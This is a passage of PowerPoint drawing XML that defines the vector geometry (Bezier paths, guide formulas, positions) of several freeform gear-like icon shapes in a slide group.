                    <a:pt x="236" y="79"/>
                    <a:pt x="235" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="59"/>
                    <a:pt x="205" y="66"/>
                    <a:pt x="190" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="81"/>
                    <a:pt x="202" y="92"/>
                    <a:pt x="202" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="116"/>
                    <a:pt x="197" y="128"/>
                    <a:pt x="189" y="136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57" y="168"/>
                    <a:pt x="141" y="168"/>
                    <a:pt x="131" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="149"/>
                    <a:pt x="121" y="133"/>
                    <a:pt x="131" y="123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0" y="94"/>
                    <a:pt x="136" y="80"/>
                    <a:pt x="138" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="51"/>
                    <a:pt x="148" y="39"/>
                    <a:pt x="161" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20"/>
                    <a:pt x="204" y="11"/>
                    <a:pt x="227" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="0"/>
                    <a:pt x="255" y="3"/>
                    <a:pt x="267" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="21"/>
                    <a:pt x="285" y="34"/>
                    <a:pt x="285" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="48"/>
                    <a:pt x="350" y="48"/>
                    <a:pt x="350" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="34"/>
                    <a:pt x="357" y="21"/>
                    <a:pt x="368" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="3"/>
                    <a:pt x="395" y="0"/>
                    <a:pt x="409" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="11"/>
                    <a:pt x="454" y="20"/>
                    <a:pt x="475" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="39"/>
                    <a:pt x="496" y="51"/>
                    <a:pt x="498" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="80"/>
                    <a:pt x="495" y="94"/>
                    <a:pt x="485" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="150"/>
                    <a:pt x="531" y="150"/>
                    <a:pt x="531" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541" y="140"/>
                    <a:pt x="555" y="135"/>
                    <a:pt x="570" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="139"/>
                    <a:pt x="596" y="148"/>
                    <a:pt x="603" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="181"/>
                    <a:pt x="624" y="204"/>
                    <a:pt x="631" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="635" y="241"/>
                    <a:pt x="632" y="255"/>
                    <a:pt x="624" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="279"/>
                    <a:pt x="602" y="285"/>
                    <a:pt x="587" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="285"/>
                    <a:pt x="587" y="285"/>
                    <a:pt x="587" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="350"/>
                    <a:pt x="587" y="350"/>
                    <a:pt x="587" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="350"/>
                    <a:pt x="615" y="357"/>
                    <a:pt x="624" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="633" y="380"/>
                    <a:pt x="635" y="395"/>
                    <a:pt x="631" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="625" y="431"/>
                    <a:pt x="615" y="454"/>
                    <a:pt x="604" y="475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="597" y="488"/>
                    <a:pt x="585" y="496"/>
                    <a:pt x="570" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="500"/>
                    <a:pt x="542" y="495"/>
                    <a:pt x="531" y="485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96" y="541"/>
                    <a:pt x="501" y="555"/>
                    <a:pt x="499" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="584"/>
                    <a:pt x="488" y="596"/>
                    <a:pt x="476" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="615"/>
                    <a:pt x="432" y="625"/>
                    <a:pt x="409" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404" y="633"/>
                    <a:pt x="400" y="633"/>
                    <a:pt x="396" y="633"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="566" y="186"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="566" y="186"/>
                    <a:pt x="566" y="186"/>
                    <a:pt x="566" y="186"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="528" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="153"/>
                    <a:pt x="528" y="153"/>
                    <a:pt x="528" y="153"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="482" y="107"/>
                    <a:pt x="482" y="107"/>
                    <a:pt x="482" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="153" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="107"/>
                    <a:pt x="153" y="107"/>
                    <a:pt x="153" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="450" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="449" y="69"/>
                    <a:pt x="449" y="69"/>
                    <a:pt x="449" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="450" y="69"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="186" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="6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4" name="Freeform 361">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED49A9A-102F-4C3A-98C2-40A22764C6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70541" y="4146407"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 124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5 w 256"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 34 w 256"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 200 w 256"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 256"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 124 w 256"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 51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30 w 256"/>
                <a:gd name="T23" fmla="*/ 200 h 250"/>
                <a:gd name="T24" fmla="*/ 176 w 256"/>
                <a:gd name="T25" fmla="*/ 176 h 250"/>
                <a:gd name="T26" fmla="*/ 191 w 256"/>
                <a:gd name="T27" fmla="*/ 126 h 250"/>
                <a:gd name="T28" fmla="*/ 167 w 256"/>
                <a:gd name="T29" fmla="*/ 80 h 250"/>
                <a:gd name="T30" fmla="*/ 118 w 256"/>
                <a:gd name="T31" fmla="*/ 64 h 250"/>
                <a:gd name="T32" fmla="*/ 72 w 256"/>
                <a:gd name="T33" fmla="*/ 88 h 250"/>
                <a:gd name="T34" fmla="*/ 51 w 256"/>
                <a:gd name="T35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0">
                  <a:moveTo>
                    <a:pt x="124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2" y="89"/>
                    <a:pt x="35" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="80"/>
                    <a:pt x="25" y="66"/>
                    <a:pt x="34" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="6"/>
                    <a:pt x="150" y="0"/>
                    <a:pt x="200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1" y="236"/>
                    <a:pt x="157" y="250"/>
                    <a:pt x="124" y="250"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="51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3" y="143"/>
                    <a:pt x="61" y="168"/>
                    <a:pt x="80" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="196"/>
                    <a:pt x="112" y="201"/>
                    <a:pt x="130" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="198"/>
                    <a:pt x="164" y="190"/>
                    <a:pt x="176" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="162"/>
                    <a:pt x="193" y="144"/>
                    <a:pt x="191" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="108"/>
                    <a:pt x="181" y="92"/>
                    <a:pt x="167" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="68"/>
                    <a:pt x="136" y="63"/>
                    <a:pt x="118" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="66"/>
                    <a:pt x="84" y="75"/>
                    <a:pt x="72" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="95"/>
                    <a:pt x="58" y="98"/>
                    <a:pt x="51" y="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5" name="Freeform 362">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3ACA97E-6B17-48DE-B614-FC65A4AA61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12627" y="4311594"/>
              <a:ext cx="472777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8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81 w 635"/>
                <a:gd name="T45" fmla="*/ 399 h 635"/>
                <a:gd name="T46" fmla="*/ 537 w 635"/>
                <a:gd name="T47" fmla="*/ 280 h 635"/>
                <a:gd name="T48" fmla="*/ 562 w 635"/>
                <a:gd name="T49" fmla="*/ 189 h 635"/>
                <a:gd name="T50" fmla="*/ 447 w 635"/>
                <a:gd name="T51" fmla="*/ 136 h 635"/>
                <a:gd name="T52" fmla="*/ 400 w 635"/>
                <a:gd name="T53" fmla="*/ 53 h 635"/>
                <a:gd name="T54" fmla="*/ 281 w 635"/>
                <a:gd name="T55" fmla="*/ 97 h 635"/>
                <a:gd name="T56" fmla="*/ 190 w 635"/>
                <a:gd name="T57" fmla="*/ 72 h 635"/>
                <a:gd name="T58" fmla="*/ 166 w 635"/>
                <a:gd name="T59" fmla="*/ 158 h 635"/>
                <a:gd name="T60" fmla="*/ 131 w 635"/>
                <a:gd name="T61" fmla="*/ 122 h 635"/>
                <a:gd name="T62" fmla="*/ 138 w 635"/>
                <a:gd name="T63" fmla="*/ 65 h 635"/>
                <a:gd name="T64" fmla="*/ 227 w 635"/>
                <a:gd name="T65" fmla="*/ 4 h 635"/>
                <a:gd name="T66" fmla="*/ 285 w 635"/>
                <a:gd name="T67" fmla="*/ 47 h 635"/>
                <a:gd name="T68" fmla="*/ 368 w 635"/>
                <a:gd name="T69" fmla="*/ 11 h 635"/>
                <a:gd name="T70" fmla="*/ 475 w 635"/>
                <a:gd name="T71" fmla="*/ 31 h 635"/>
                <a:gd name="T72" fmla="*/ 485 w 635"/>
                <a:gd name="T73" fmla="*/ 103 h 635"/>
                <a:gd name="T74" fmla="*/ 569 w 635"/>
                <a:gd name="T75" fmla="*/ 136 h 635"/>
                <a:gd name="T76" fmla="*/ 631 w 635"/>
                <a:gd name="T77" fmla="*/ 226 h 635"/>
                <a:gd name="T78" fmla="*/ 587 w 635"/>
                <a:gd name="T79" fmla="*/ 284 h 635"/>
                <a:gd name="T80" fmla="*/ 587 w 635"/>
                <a:gd name="T81" fmla="*/ 349 h 635"/>
                <a:gd name="T82" fmla="*/ 631 w 635"/>
                <a:gd name="T83" fmla="*/ 407 h 635"/>
                <a:gd name="T84" fmla="*/ 570 w 635"/>
                <a:gd name="T85" fmla="*/ 497 h 635"/>
                <a:gd name="T86" fmla="*/ 485 w 635"/>
                <a:gd name="T87" fmla="*/ 530 h 635"/>
                <a:gd name="T88" fmla="*/ 499 w 635"/>
                <a:gd name="T89" fmla="*/ 569 h 635"/>
                <a:gd name="T90" fmla="*/ 408 w 635"/>
                <a:gd name="T91" fmla="*/ 631 h 635"/>
                <a:gd name="T92" fmla="*/ 107 w 635"/>
                <a:gd name="T93" fmla="*/ 481 h 635"/>
                <a:gd name="T94" fmla="*/ 69 w 635"/>
                <a:gd name="T95" fmla="*/ 449 h 635"/>
                <a:gd name="T96" fmla="*/ 52 w 635"/>
                <a:gd name="T97" fmla="*/ 240 h 635"/>
                <a:gd name="T98" fmla="*/ 69 w 635"/>
                <a:gd name="T99" fmla="*/ 18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7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1"/>
                    <a:pt x="279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6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5"/>
                    <a:pt x="79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8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2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2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6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4"/>
                    <a:pt x="429" y="515"/>
                    <a:pt x="447" y="498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16" y="428"/>
                    <a:pt x="544" y="428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7" y="399"/>
                    <a:pt x="537" y="378"/>
                    <a:pt x="537" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="280"/>
                    <a:pt x="537" y="280"/>
                    <a:pt x="537" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537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44" y="205"/>
                    <a:pt x="516" y="205"/>
                    <a:pt x="499" y="188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6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5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7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6" y="79"/>
                    <a:pt x="138" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="50"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="161" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20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4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1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close/>
                  <a:moveTo>
                    <a:pt x="69" y="185"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="185"/>
                    <a:pt x="69" y="185"/>
                    <a:pt x="69" y="185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6" name="Freeform 363">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DBB84F3-2A45-472E-A007-57202343BA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7876" y="4451148"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123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4 w 256"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 33 w 256"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 199 w 256"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 256"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 123 w 256"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 50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75 w 256"/>
                <a:gd name="T23" fmla="*/ 176 h 250"/>
                <a:gd name="T24" fmla="*/ 167 w 256"/>
                <a:gd name="T25" fmla="*/ 80 h 250"/>
                <a:gd name="T26" fmla="*/ 118 w 256"/>
                <a:gd name="T27" fmla="*/ 65 h 250"/>
                <a:gd name="T28" fmla="*/ 72 w 256"/>
                <a:gd name="T29" fmla="*/ 88 h 250"/>
                <a:gd name="T30" fmla="*/ 50 w 256"/>
                <a:gd name="T31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6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53" y="69"/>
                    <a:pt x="136" y="63"/>
                    <a:pt x="118" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="66"/>
                    <a:pt x="83" y="75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417" name="Gruppe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C259512B-E8EE-4EAA-898F-5CB171A180A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4330700" y="3035300"/>
            <a:ext cx="387900" cy="540684"/>
            <a:chOff x="5025291" y="3667933"/>
            <a:chExt cx="860113" cy="1116439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="418" name="Freeform 358">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C738B6D4-AB26-4986-BDFC-D86490B920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9777" y="3667933"/>
              <a:ext cx="475626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7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31 w 635"/>
                <a:gd name="T45" fmla="*/ 432 h 635"/>
                <a:gd name="T46" fmla="*/ 581 w 635"/>
                <a:gd name="T47" fmla="*/ 399 h 635"/>
                <a:gd name="T48" fmla="*/ 536 w 635"/>
                <a:gd name="T49" fmla="*/ 280 h 635"/>
                <a:gd name="T50" fmla="*/ 562 w 635"/>
                <a:gd name="T51" fmla="*/ 189 h 635"/>
                <a:gd name="T52" fmla="*/ 531 w 635"/>
                <a:gd name="T53" fmla="*/ 201 h 635"/>
                <a:gd name="T54" fmla="*/ 447 w 635"/>
                <a:gd name="T55" fmla="*/ 136 h 635"/>
                <a:gd name="T56" fmla="*/ 400 w 635"/>
                <a:gd name="T57" fmla="*/ 53 h 635"/>
                <a:gd name="T58" fmla="*/ 281 w 635"/>
                <a:gd name="T59" fmla="*/ 97 h 635"/>
                <a:gd name="T60" fmla="*/ 190 w 635"/>
                <a:gd name="T61" fmla="*/ 72 h 635"/>
                <a:gd name="T62" fmla="*/ 166 w 635"/>
                <a:gd name="T63" fmla="*/ 158 h 635"/>
                <a:gd name="T64" fmla="*/ 131 w 635"/>
                <a:gd name="T65" fmla="*/ 122 h 635"/>
                <a:gd name="T66" fmla="*/ 137 w 635"/>
                <a:gd name="T67" fmla="*/ 65 h 635"/>
                <a:gd name="T68" fmla="*/ 227 w 635"/>
                <a:gd name="T69" fmla="*/ 4 h 635"/>
                <a:gd name="T70" fmla="*/ 285 w 635"/>
                <a:gd name="T71" fmla="*/ 47 h 635"/>
                <a:gd name="T72" fmla="*/ 368 w 635"/>
                <a:gd name="T73" fmla="*/ 11 h 635"/>
                <a:gd name="T74" fmla="*/ 475 w 635"/>
                <a:gd name="T75" fmla="*/ 31 h 635"/>
                <a:gd name="T76" fmla="*/ 485 w 635"/>
                <a:gd name="T77" fmla="*/ 103 h 635"/>
                <a:gd name="T78" fmla="*/ 569 w 635"/>
                <a:gd name="T79" fmla="*/ 136 h 635"/>
                <a:gd name="T80" fmla="*/ 631 w 635"/>
                <a:gd name="T81" fmla="*/ 226 h 635"/>
                <a:gd name="T82" fmla="*/ 587 w 635"/>
                <a:gd name="T83" fmla="*/ 284 h 635"/>
                <a:gd name="T84" fmla="*/ 587 w 635"/>
                <a:gd name="T85" fmla="*/ 349 h 635"/>
                <a:gd name="T86" fmla="*/ 631 w 635"/>
                <a:gd name="T87" fmla="*/ 407 h 635"/>
                <a:gd name="T88" fmla="*/ 570 w 635"/>
                <a:gd name="T89" fmla="*/ 497 h 635"/>
                <a:gd name="T90" fmla="*/ 485 w 635"/>
                <a:gd name="T91" fmla="*/ 530 h 635"/>
                <a:gd name="T92" fmla="*/ 499 w 635"/>
                <a:gd name="T93" fmla="*/ 569 h 635"/>
                <a:gd name="T94" fmla="*/ 408 w 635"/>
                <a:gd name="T95" fmla="*/ 631 h 635"/>
                <a:gd name="T96" fmla="*/ 107 w 635"/>
                <a:gd name="T97" fmla="*/ 481 h 635"/>
                <a:gd name="T98" fmla="*/ 76 w 635"/>
                <a:gd name="T99" fmla="*/ 450 h 635"/>
                <a:gd name="T100" fmla="*/ 69 w 635"/>
                <a:gd name="T101" fmla="*/ 449 h 635"/>
                <a:gd name="T102" fmla="*/ 52 w 635"/>
                <a:gd name="T103" fmla="*/ 240 h 635"/>
                <a:gd name="T104" fmla="*/ 69 w 635"/>
                <a:gd name="T105" fmla="*/ 184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6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6"/>
                    <a:pt x="285" y="586"/>
                    <a:pt x="285" y="586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="601"/>
                    <a:pt x="278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5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94" y="495"/>
                    <a:pt x="80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7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1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1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5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3"/>
                    <a:pt x="429" y="515"/>
                    <a:pt x="447" y="497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07" y="437"/>
                    <a:pt x="519" y="432"/>
                    <a:pt x="531" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="432"/>
                    <a:pt x="531" y="432"/>
                    <a:pt x="531" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="432"/>
                    <a:pt x="554" y="437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6" y="399"/>
                    <a:pt x="536" y="378"/>
                    <a:pt x="536" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536" y="280"/>
                    <a:pt x="536" y="280"/>
                    <a:pt x="536" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536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53" y="197"/>
                    <a:pt x="542" y="201"/>
                    <a:pt x="531" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="201"/>
                    <a:pt x="531" y="201"/>
                    <a:pt x="531" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="201"/>
                    <a:pt x="507" y="196"/>
                    <a:pt x="498" y="187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5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4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6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5" y="79"/>
                    <a:pt x="137" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="50"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="161" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="19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3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0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76" y="450"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="450"/>
                    <a:pt x="76" y="450"/>
                    <a:pt x="76" y="450"/>
                  </a:cubicBezTo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moveTo>
                    <a:pt x="69" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="184"/>
                    <a:pt x="69" y="184"/>
                    <a:pt x="69" y="184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19" name="Freeform 359">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53B19A2B-4F21-40C0-B759-30B8F323C0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5029" y="3807487"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123 w 255"/>
                <a:gd name="T1" fmla="*/ 250 h 250"/>
                <a:gd name="T2" fmla="*/ 48 w 255"/>
                <a:gd name="T3" fmla="*/ 222 h 250"/>
                <a:gd name="T4" fmla="*/ 8 w 255"/>
                <a:gd name="T5" fmla="*/ 110 h 250"/>
                <a:gd name="T6" fmla="*/ 34 w 255"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 33 w 255"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 199 w 255"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 255"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 123 w 255"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 50 w 255"/>
                <a:gd name="T17" fmla="*/ 97 h 250"/>
                <a:gd name="T18" fmla="*/ 57 w 255"/>
                <a:gd name="T19" fmla="*/ 119 h 250"/>
                <a:gd name="T20" fmla="*/ 80 w 255"/>
                <a:gd name="T21" fmla="*/ 184 h 250"/>
                <a:gd name="T22" fmla="*/ 175 w 255"/>
                <a:gd name="T23" fmla="*/ 176 h 250"/>
                <a:gd name="T24" fmla="*/ 167 w 255"/>
                <a:gd name="T25" fmla="*/ 80 h 250"/>
                <a:gd name="T26" fmla="*/ 72 w 255"/>
                <a:gd name="T27" fmla="*/ 88 h 250"/>
                <a:gd name="T28" fmla="*/ 50 w 255"/>
                <a:gd name="T29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5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5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8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39" y="56"/>
                    <a:pt x="96" y="60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0" name="Freeform 360">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1873C7C-0E17-49B6-873C-EDDCEA3B57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25291" y="4009700"/>
              <a:ext cx="475626" cy="472778"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 368 w 635"/>
                <a:gd name="T1" fmla="*/ 624 h 636"/>
                <a:gd name="T2" fmla="*/ 350 w 635"/>
                <a:gd name="T3" fmla="*/ 587 h 636"/>
                <a:gd name="T4" fmla="*/ 267 w 635"/>
                <a:gd name="T5" fmla="*/ 624 h 636"/>
                <a:gd name="T6" fmla="*/ 160 w 635"/>
                <a:gd name="T7" fmla="*/ 603 h 636"/>
                <a:gd name="T8" fmla="*/ 150 w 635"/>
                <a:gd name="T9" fmla="*/ 531 h 636"/>
                <a:gd name="T10" fmla="*/ 104 w 635"/>
                <a:gd name="T11" fmla="*/ 485 h 636"/>
                <a:gd name="T12" fmla="*/ 32 w 635"/>
                <a:gd name="T13" fmla="*/ 475 h 636"/>
                <a:gd name="T14" fmla="*/ 12 w 635"/>
                <a:gd name="T15" fmla="*/ 368 h 636"/>
                <a:gd name="T16" fmla="*/ 48 w 635"/>
                <a:gd name="T17" fmla="*/ 285 h 636"/>
                <a:gd name="T18" fmla="*/ 4 w 635"/>
                <a:gd name="T19" fmla="*/ 227 h 636"/>
                <a:gd name="T20" fmla="*/ 66 w 635"/>
                <a:gd name="T21" fmla="*/ 137 h 636"/>
                <a:gd name="T22" fmla="*/ 108 w 635"/>
                <a:gd name="T23" fmla="*/ 153 h 636"/>
                <a:gd name="T24" fmla="*/ 73 w 635"/>
                <a:gd name="T25" fmla="*/ 189 h 636"/>
                <a:gd name="T26" fmla="*/ 98 w 635"/>
                <a:gd name="T27" fmla="*/ 281 h 636"/>
                <a:gd name="T28" fmla="*/ 54 w 635"/>
                <a:gd name="T29" fmla="*/ 400 h 636"/>
                <a:gd name="T30" fmla="*/ 137 w 635"/>
                <a:gd name="T31" fmla="*/ 447 h 636"/>
                <a:gd name="T32" fmla="*/ 189 w 635"/>
                <a:gd name="T33" fmla="*/ 562 h 636"/>
                <a:gd name="T34" fmla="*/ 281 w 635"/>
                <a:gd name="T35" fmla="*/ 537 h 636"/>
                <a:gd name="T36" fmla="*/ 400 w 635"/>
                <a:gd name="T37" fmla="*/ 582 h 636"/>
                <a:gd name="T38" fmla="*/ 447 w 635"/>
                <a:gd name="T39" fmla="*/ 498 h 636"/>
                <a:gd name="T40" fmla="*/ 531 w 635"/>
                <a:gd name="T41" fmla="*/ 433 h 636"/>
                <a:gd name="T42" fmla="*/ 563 w 635"/>
                <a:gd name="T43" fmla="*/ 446 h 636"/>
                <a:gd name="T44" fmla="*/ 537 w 635"/>
                <a:gd name="T45" fmla="*/ 354 h 636"/>
                <a:gd name="T46" fmla="*/ 581 w 635"/>
                <a:gd name="T47" fmla="*/ 235 h 636"/>
                <a:gd name="T48" fmla="*/ 531 w 635"/>
                <a:gd name="T49" fmla="*/ 202 h 636"/>
                <a:gd name="T50" fmla="*/ 499 w 635"/>
                <a:gd name="T51" fmla="*/ 188 h 636"/>
                <a:gd name="T52" fmla="*/ 434 w 635"/>
                <a:gd name="T53" fmla="*/ 104 h 636"/>
                <a:gd name="T54" fmla="*/ 400 w 635"/>
                <a:gd name="T55" fmla="*/ 54 h 636"/>
                <a:gd name="T56" fmla="*/ 281 w 635"/>
                <a:gd name="T57" fmla="*/ 98 h 636"/>
                <a:gd name="T58" fmla="*/ 190 w 635"/>
                <a:gd name="T59" fmla="*/ 73 h 636"/>
                <a:gd name="T60" fmla="*/ 189 w 635"/>
                <a:gd name="T61" fmla="*/ 136 h 636"/>
                <a:gd name="T62" fmla="*/ 131 w 635"/>
                <a:gd name="T63" fmla="*/ 159 h 636"/>
                <a:gd name="T64" fmla="*/ 150 w 635"/>
                <a:gd name="T65" fmla="*/ 104 h 636"/>
                <a:gd name="T66" fmla="*/ 161 w 635"/>
                <a:gd name="T67" fmla="*/ 32 h 636"/>
                <a:gd name="T68" fmla="*/ 267 w 635"/>
                <a:gd name="T69" fmla="*/ 12 h 636"/>
                <a:gd name="T70" fmla="*/ 350 w 635"/>
                <a:gd name="T71" fmla="*/ 48 h 636"/>
